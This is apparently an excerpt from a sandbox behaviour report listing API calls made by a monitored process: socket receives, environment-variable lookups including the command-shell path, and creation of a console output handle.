Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 4848	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 11568, size_out = 11568	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 1495	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 2153, size_out = 2153	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 16416, size_out = 9458	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 6958, size_out = 6958	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3648, size_out = 3648	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 11488, size_out = 11488	1	Fn Data
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = comSpeC, result_out = C:\Windows\system32\cmd.exe	2	Fn
Environment	Get Environment String	name = MshEnableTrace	10	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn

Monitored Processes

Behavior Information - Sequential View

Before

After